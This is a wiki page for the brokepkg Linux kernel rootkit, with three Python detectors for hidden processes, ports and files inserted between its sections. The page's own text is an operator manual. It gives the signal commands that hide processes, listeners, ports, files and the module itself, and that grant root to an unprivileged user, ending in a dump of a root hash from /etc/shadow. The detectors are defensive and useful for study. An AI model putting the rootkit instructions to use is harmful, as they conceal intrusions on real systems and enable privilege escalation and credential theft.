Jorge Buzeti edited this page Feb 9, 2023 · 2 revisions

Using your rootkit

Now that the rootkit is installed, let's go through its features and how to use and communicate with them.

All signal definitions can be found in the enum in "include/hooks.h", and MAGIC_HIDE in "include/config.h".

Hide/unhide any process by sending the signal SIGMODINVIS:

The default signal is 63; the pid it is sent to toggles between the hidden and visible states.

root@broke:~# ps aux | grep '[n]c -nlvp'
root      4062  0.0  0.0  13600  1100 pts/2    S+   02:04   0:00 nc -nlvp 9001
root@broke:~# kill -63 4062
# invisible process
root@broke:~# ps aux | grep '[n]c -nlvp'
# but it is still alive
root@broke:~# echo process live | nc 0 9001
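The transcript above shows that a hidden process keeps running and keeps answering on its socket; only the listing is filtered. A defender-side check, added here and not part of brokepkg, uses that gap: it compares the PIDs that /proc enumerates (what ps walks) against the PIDs that answer a direct /proc/<pid> lookup. It assumes standard Linux procfs semantics and that the rootkit filters the directory listing rather than the path lookup; the constants and function names are this example's own.

```python
import os


def listed_pids(proc="/proc"):
    """PIDs returned by enumerating /proc (getdents), which is what ps walks."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}


def probed_pids(proc="/proc", pid_max=None):
    """PIDs that answer a direct lookup of /proc/<pid>. A lookup by path does not
    go through the directory listing, so a filtered listing does not affect it.
    Assumption: the rootkit hides by filtering the listing, as the page shows."""
    if pid_max is None:
        with open("/proc/sys/kernel/pid_max") as f:
            pid_max = int(f.read())
    found = set()
    for pid in range(1, pid_max + 1):
        try:
            os.stat(f"{proc}/{pid}")
            found.add(pid)
        except (FileNotFoundError, ProcessLookupError):
            continue          # nothing there
        except OSError:
            found.add(pid)    # any other error means something answered
    return found


def hidden_pids(listed, probed):
    """PIDs reachable by lookup but absent from the listing."""
    return sorted(probed - listed)


def find_hidden_pids(proc="/proc", pid_max=None):
    """Scan, then re-check every candidate against a fresh listing so that a
    process created or destroyed while the scan ran is not reported."""
    # listed_pids() is evaluated before probed_pids(), so a process that starts
    # mid-scan shows up as a candidate and is then discarded by the fresh listing
    candidates = hidden_pids(listed_pids(proc), probed_pids(proc, pid_max))
    fresh = listed_pids(proc)
    confirmed = []
    for pid in candidates:
        if pid in fresh:
            continue
        if not os.path.exists(f"{proc}/{pid}"):
            continue          # exited meanwhile
        confirmed.append(pid)
    return confirmed


def describe(pid, proc="/proc"):
    """Best-effort process name for the report."""
    try:
        with open(f"{proc}/{pid}/comm") as f:
            return f.read().strip()
    except OSError:
        return "?"


if __name__ == "__main__":
    for pid in find_hidden_pids():
        print(f"hidden pid {pid}: {describe(pid)}")
```

Probing every PID up to pid_max is a few million stat calls and takes a few seconds; a clean machine prints nothing. The check is only as good as its assumption: a rootkit that also hooks the path lookup would not be caught this way.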

Make the module (in)visible by sending the signal SIGHIDE:

The default signal is 31; the pid is ignored, so it can be any number.

On a non-debug build, the module hides itself automatically.

root@broke:~# lsmod | grep broke
brokepkg              147456  0
root@broke:~# kill -31 0
# module is now invisible
root@broke:~# lsmod | grep broke
root@broke:~# kill -31 0
root@broke:~# lsmod | grep broke
brokepkg              147456  0

Become root by sending the signal SIGROOT:

The default signal is 64; the pid is ignored, so it can be any number.

ubuntu@broke:~$ id -u && head -1 /etc/shadow
1003
head: cannot open '/etc/shadow' for reading: Permission denied
ubuntu@broke:~$ kill -64 0
ubuntu@broke:~$ id -u && head -1 /etc/shadow
0
root:$6$kXyEb.NF$F60TjtZ8vC1eo183BWbGi5NlBWAkQxjo/Uwm4.CvIv2ek2hdkgJQtrUGfiXmh6nmRf/R4LMwk7JzLfGZdllWN1:19381:0:99999:7:::

Hide/unhide any port by sending the signal SIGPORT:

The default signal is 62; the pid argument is used as the port number whose hidden/visible state is toggled.

root@broke:~# netstat -nlpt | grep malware
tcp        0      0 0.0.0.0:9001            0.0.0.0:*               LISTEN      4321/./malware      
root@broke:~# kill -62 9001 # port number
root@broke:~# netstat -nlpt | grep malware
root@broke:~# 
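Hiding a port only changes what /proc/net/tcp reports; the socket itself still owns the port. A defender-side check, added here and not part of brokepkg, asks the kernel directly: it parses the local ports of every socket listed in /proc/net/tcp and /proc/net/tcp6, then tries to bind each port and treats EADDRINUSE on a port the listing does not mention as a hidden socket. The sample /proc/net/tcp text below is constructed for the test; the function names are this example's own, and it assumes the procfs format of current Linux kernels.

```python
import errno
import socket

# Constructed sample in /proc/net/tcp format: sshd on 22, a listener on 9001
# (0x2329) and one established client connection from local port 40000 (0x9C40).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   1: 00000000:2329 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 22222 1 0000000000000000 100 0 0 10 0
   2: 0100007F:9C40 0100007F:2329 01 00000000:00000000 00:00000000 00000000  1000        0 33333 1 0000000000000000 20 4 30 10 -1
"""


def local_ports(proc_net_tcp_text):
    """Local port of every socket, in any state, from /proc/net/tcp or tcp6 text.
    All states are collected so that an established connection's local port is
    not mistaken for a hidden listener by the bind probe."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:   # first line is the header
        fields = line.split()
        if len(fields) < 4:
            continue
        local_hex = fields[1].rsplit(":", 1)[1]         # works for v4 and v6 rows
        ports.add(int(local_hex, 16))
    return ports


def port_in_use(port, addr="0.0.0.0"):
    """True if the kernel refuses the bind with EADDRINUSE, i.e. a socket already
    owns the port regardless of what procfs shows. None when the probe cannot
    decide (for example EACCES on a privileged port when not running as root)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind((addr, port))
        return False
    except OSError as e:
        if e.errno == errno.EADDRINUSE:
            return True
        return None
    finally:
        s.close()


def hidden_ports(listed, probe, ports):
    """Ports the probe reports as in use that the listing does not mention."""
    return sorted(p for p in ports if p not in listed and probe(p) is True)


def find_hidden_ports(ports=range(1, 65536)):
    listed = set()
    for path in ("/proc/net/tcp", "/proc/net/tcp6"):
        try:
            with open(path) as f:
                listed |= local_ports(f.read())
        except FileNotFoundError:
            continue
    return hidden_ports(listed, port_in_use, ports)


if __name__ == "__main__":
    for port in find_hidden_ports():
        print(f"tcp port {port} is bound but missing from /proc/net/tcp")
```

Run it as root so that privileged ports are probed too; the same comparison is what unhide-tcp performs. A listener bound with IPV6_V6ONLY on an IPv6 address does not block a 0.0.0.0 bind, so a v6-only hidden socket needs the probe repeated with an AF_INET6 socket.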

Files or directories whose names contain the MAGIC_HIDE pattern become invisible:

The default value is br0k3_n0w_h1dd3n.

root@broke:~# mkdir br0k3_n0w_h1dd3n
root@broke:~# ls -la
total 12
drwxr-xr-x 3 root root 4096 Feb  9 02:39 .
drwxr-xr-x 3 root root 4096 Feb  9 02:39 ..
drwxr-xr-x 2 root root 4096 Feb  9 02:35 br0k3_n0w_h1dd3n
root@broke:~# echo 'my malware or c2' > br0k3_n0w_h1dd3n/malware
root@broke:~# sudo insmod /brokepkg.ko
root@broke:~# ls -la
total 8
drwxr-xr-x 2 root root 4096 Feb  9 02:40 .
drwxr-xr-x 3 root root 4096 Feb  9 02:39 ..
root@broke:~# echo -ne '#!/bin/sh\necho executed from hide fs' > br0k3_n0w_h1dd3n/hide.sh
root@broke:~# chmod +x br0k3_n0w_h1dd3n/hide.sh
root@broke:~# ./br0k3_n0w_h1dd3n/hide.sh
executed from hide fs
root@broke:~# ls -la
total 8
drwxr-xr-x 2 root root 4096 Feb  9 02:40 .
drwxr-xr-x 3 root root 4096 Feb  9 02:39 ..
root@broke:~#
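The last transcript shows the key property of this kind of hiding: ls no longer lists the directory, yet hide.sh still runs when addressed by its full path, because only the directory listing is filtered, not the path lookup. A defender-side check, added here and not part of brokepkg, probes candidate names with lstat and reports any that resolve but are missing from the listing. It assumes the default MAGIC_HIDE value documented above; since the marker is a substring of the name, the candidate list has to be extended with the exact names in use, which is this check's main limitation.

```python
import os
import sys

# Default MAGIC_HIDE value as documented on this page; adjust if config.h was changed.
MAGIC_HIDE = "br0k3_n0w_h1dd3n"


def listed_names(directory):
    """Names the directory listing (getdents) returns, which is what ls shows."""
    return set(os.listdir(directory))


def present_by_lookup(directory, candidates):
    """Candidate names that resolve through a direct path lookup. The lookup
    bypasses the listing filter, which is why hide.sh above still executed."""
    found = set()
    for name in candidates:
        try:
            os.lstat(os.path.join(directory, name))
            found.add(name)
        except FileNotFoundError:
            continue
    return found


def hidden_entries(listed, present):
    """Names reachable by lookup but absent from the listing."""
    return sorted(present - listed)


def check_directory(directory, candidates=(MAGIC_HIDE,)):
    """Report candidates that exist in `directory` but are not listed there."""
    present = present_by_lookup(directory, candidates)
    return hidden_entries(listed_names(directory), present)


def walk_and_check(root, candidates=(MAGIC_HIDE,)):
    """Apply the check to every directory under root. A hidden directory is never
    descended into (the walker cannot see it), so each level is probed by name."""
    findings = []
    for dirpath, _dirnames, _filenames in os.walk(root):
        for name in check_directory(dirpath, candidates):
            findings.append(os.path.join(dirpath, name))
    return findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path in walk_and_check(root):
        print(f"exists but not listed: {path}")
```

Point it at a specific tree (home directories, /tmp, /var/tmp) rather than / to keep the walk short. A hit means the name resolves while the listing denies it exists, which on a healthy filesystem does not happen.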